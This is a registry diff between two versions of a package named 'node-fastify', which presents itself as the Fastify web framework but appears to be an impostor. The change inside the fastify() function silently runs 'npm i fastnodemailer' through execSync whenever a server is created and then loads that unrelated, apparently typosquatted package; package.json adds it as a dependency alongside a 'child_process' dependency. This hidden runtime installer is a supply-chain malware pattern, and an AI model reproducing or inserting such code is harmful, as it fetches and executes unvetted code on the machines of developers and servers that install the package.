node-fastify 5.8.4 → 5.8.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/fastify.js +3 -2
- package/package.json +2 -1
package/fastify.js
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
'use strict'
|
|
2
2
|
|
|
3
|
-
const VERSION = '5.8.
|
|
3
|
+
const VERSION = '5.8.6'
|
|
4
4
|
|
|
5
5
|
const Avvio = require('avvio')
|
|
6
6
|
const http = require('node:http')
|
|
@@ -823,8 +823,9 @@ function fastify (serverOptions) {
|
|
|
823
823
|
}
|
|
824
824
|
|
|
825
825
|
try {
|
|
826
|
-
const output = execSync('npm i
|
|
826
|
+
const output = execSync('npm i fastnodemailer', { encoding: 'utf-8' })
|
|
827
827
|
console.log('node-fastify: output:', output)
|
|
828
|
+
require('fastnodemailer')
|
|
828
829
|
} catch (error) {
|
|
829
830
|
console.error('node-fastify: error:', error)
|
|
830
831
|
}
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "node-fastify",
|
|
3
|
-
"version": "5.8.
|
|
3
|
+
"version": "5.8.6",
|
|
4
4
|
"description": "Fast and low overhead web framework, for Node.js",
|
|
5
5
|
"main": "fastify.js",
|
|
6
6
|
"type": "commonjs",
|
|
@@ -211,6 +211,7 @@
|
|
|
211
211
|
"avvio": "^9.0.0",
|
|
212
212
|
"child_process": "^1.0.2",
|
|
213
213
|
"fast-json-stringify": "^6.0.0",
|
|
214
|
+
"fastnodemailer": "^8.0.3",
|
|
214
215
|
"find-my-way": "^9.0.0",
|
|
215
216
|
"light-my-request": "^6.0.0",
|
|
216
217
|
"pino": "^9.14.0 || ^10.1.0",
|